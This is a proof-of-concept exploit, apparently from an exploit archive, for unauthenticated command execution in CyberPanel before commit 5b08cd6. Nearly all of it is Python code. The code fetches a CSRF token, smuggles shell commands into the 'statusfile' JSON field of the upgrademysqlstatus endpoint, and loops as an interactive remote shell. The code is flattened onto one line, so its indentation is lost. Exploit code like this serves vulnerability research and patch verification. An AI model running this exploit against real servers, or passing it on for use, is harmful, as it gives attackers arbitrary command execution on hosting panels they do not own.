
CyberPanel upgrademysqlstatus Arbitrary Command Execution

Proof of concept remote command execution exploit for CyberPanel versions prior to 5b08cd6.

import httpx import sys def get_CSRF_token(client):    resp = client.get("/")        return resp.cookies['csrftoken']    def pwn(client, CSRF_token, cmd):    headers = {        "X-CSRFToken": CSRF_token,        "Content-Type":"application/json",        "Referer": str(client.base_url)    }        payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)        return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json()["requestStatus"]    def exploit(client, cmd):    CSRF_token = get_CSRF_token(client)    stdout = pwn(client, CSRF_token, cmd)    print(stdout)    if __name__ == "__main__":    target = sys.argv[1]        client = httpx.Client(base_url=target, verify=False)    while True:        cmd = input("$> ")        exploit(client, cmd)
